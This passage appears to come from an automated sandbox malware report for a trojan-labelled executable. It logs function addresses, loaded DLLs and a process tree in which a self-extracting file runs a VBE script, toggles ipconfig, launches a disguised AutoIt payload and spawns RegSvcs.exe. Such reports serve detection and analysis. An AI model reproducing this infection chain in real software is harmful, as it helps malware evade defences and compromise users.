                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146516C14_2_0146516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141F17214_2_0141F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143B1B014_2_0143B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DF0CC14_2_014DF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014370C014_2_014370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E70E914_2_014E70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EF0E014_2_014EF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141D34C14_2_0141D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E132D14_2_014E132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0147739A14_2_0147739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144B2C014_2_0144B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D12ED14_2_014D12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014352A014_2_014352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E757114_2_014E7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F95C314_2_014F95C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CD5B014_2_014CD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142146014_2_01421460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EF43F14_2_014EF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EF7B014_2_014EF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0147563014_2_01475630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E16CC14_2_014E16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143995014_2_01439950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144B95014_2_0144B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C591014_2_014C5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149D80014_2_0149D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014338E014_2_014338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EFB7614_2_014EFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A5BF014_2_014A5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146DBF914_2_0146DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144FB8014_2_0144FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EFA4914_2_014EFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E7A4614_2_014E7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A3A6C14_2_014A3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DDAC614_2_014DDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CDAAC14_2_014CDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01475AA014_2_01475AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D1AA314_2_014D1AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01433D4014_2_01433D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E1D5A14_2_014E1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E7D7314_2_014E7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144FDC014_2_0144FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A9C3214_2_014A9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EFCF214_2_014EFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EFF0914_2_014EFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01431F9214_2_01431F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F3FD514_2_013F3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F3FD214_2_013F3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EFFB114_2_014EFFB1
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014AF290 appears 104 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01465130 appears 57 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0149EA12 appears 82 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0141B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01477E54 appears 110 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: String function: 00E9FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: String function: 00EA0DC0 appears 46 times
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: String function: 00CB57D8 appears 67 times
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: String function: 00CB57A5 appears 34 times
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: String function: 00CB6630 appears 31 times
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs u549ed5dEA.exe
                Source: u549ed5dEA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.evad.winEXE@33/70@2/0
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C9932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_00C9932C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE194F AdjustTokenPrivileges,CloseHandle,8_2_00EE194F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_00EE1F53
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_00EF5B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_00EEDC9C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F04089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,8_2_00F04089
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CAEBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CAEBD3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2File created: C:\Users\user\ruumJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCommand line argument: sfxname0_2_00CB454A
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCommand line argument: sfxstime0_2_00CB454A
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCommand line argument: STARTDLG0_2_00CB454A
                Source: u549ed5dEA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: u549ed5dEA.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile read: C:\Users\user\Desktop\u549ed5dEA.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\u549ed5dEA.exe "C:\Users\user\Desktop\u549ed5dEA.exe"
                Source: C:\Users\user\Desktop\u549ed5dEA.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 avqj.mp2 awggmrd.xls
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\ruum\avqj.mp2.exe "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\ruum\avqj.mp2.exe "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                Source: unknownProcess created: C:\Users\user\ruum\avqj.mp2.exe "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\u549ed5dEA.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xlsJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 avqj.mp2 awggmrd.xlsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: iphlpapi.dllJump to behavior
